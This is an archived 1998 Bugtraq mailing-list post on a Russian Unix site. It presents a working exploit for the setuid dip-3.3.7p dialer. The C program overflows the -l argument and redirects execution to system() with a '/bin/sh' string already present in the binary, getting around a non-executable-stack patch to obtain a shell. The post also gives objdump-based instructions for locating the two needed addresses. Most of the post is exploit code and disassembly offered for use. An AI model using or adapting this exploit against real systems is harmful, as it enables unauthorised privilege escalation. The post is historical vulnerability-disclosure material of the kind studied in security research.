The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version
Search
Выпущена CD-версия OpenNet.RU для оффлайн просмотра.
Для формирования заказа - перейдите по ссылке.
SOFT - Unix Software catalog
LINKS - Unix resources		 TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

dip-3.3.7p exploit (stackpatch_


<< Previous INDEX Search src Set bookmark Go to bookmark Next >> 
Date: Fri, 26 Jun 1998 17:46:53 +0200
From: Thomas Troeger <tstroege@CIP.INFORMATIK.UNI-ERLANGEN.DE>
To: BUGTRAQ@NETSPACE.ORG
Subject: dip-3.3.7p exploit (stackpatch_

Hi,

While playing around with dip-3.3.7p I realized that the method I used in my
previous posting won't do. So I had a look at the source and developed a new
program. Here it goes:

------------------- sammeltonne.c -------------------
/*
 * Programm to get a shell from dip-3.3.7p on a system with
 * Solar Designer's stackpatch installed.
 * by tstroege@cip.informatik.uni-erlangen.de
 *
 * Of course this is just for educational purposes too :)
 */

#define SOMETEXT 0x0804cee5
/* address of text system call */

#define CMDSTR 0x08054f0e
/* address where command string should be */

#define DIP "/usr/sbin/dip"
/* path of dip */

int main(int argc, char *argv[]) {
  char mem[256], *ptr;
  char *name[]={ DIP, "-k", "-l", mem, (char *)0 };
  int i, code[]={ SOMETEXT, CMDSTR, 0 };
  int off=117;

  if (argc > 1) off=atoi(argv[1]);

  for (ptr=mem, i=0; i < 256; i++) *ptr++='a';
  ptr=mem+off;
  strcpy(ptr, (char *)&(code[0]));
  mem[255]=0;
  execve(name[0], name, 0);
  return 0;
}
-----------------------------------------------

SOMETEXT:
  address in text segment where system is called.

CMDSTR:
  address in text segment where a suitable command string is stored
  (dip is nice enough to have a /bin/sh string in its code).

The both addresses will be different on your system, so here is a way to
find them out:

...
objdump --disassemble-all /usr/sbin/dip
...

Now search for the following pattern:

   ...
   0804ced4 pushl  %ebx
   0804ced5 pushl  $0x8054848
   0804ceda pushl  $0x6
   0804cedc call   08049678
   0804cee1 addl   $0xc,%esp
   0804cee4 pushl  %ebx
-->0804cee5 call   080493c8        SOMETEXT
   0804ceea addl   $0x4,%esp
   0804ceed testl  %eax,%eax
   0804ceef jne    0804cf9e
   0804cef5 pushl  %esi
   0804cef6 movl   0x8(%ebp),%eax
   0804cef9 movl   0x660(%eax),%eax
   0804ceff pushl  %eax
   ...
   0804eefd leal   0xfffffc00(%ebp),%eax
   0804ef03 pushl  %eax
   0804ef04 pushl  $0x8054f08
   0804ef09 pushl  $0x8054f0b
   0804ef0e pushl  $0x8054f0e<--   CMDSTR
   0804ef13 call   08049368
   0804ef18 pushl  $0x7f
   0804ef1a call   08049768
   0804ef1f nop
   ...

tst.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки 		Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList
RB2 Network. RB2 Network.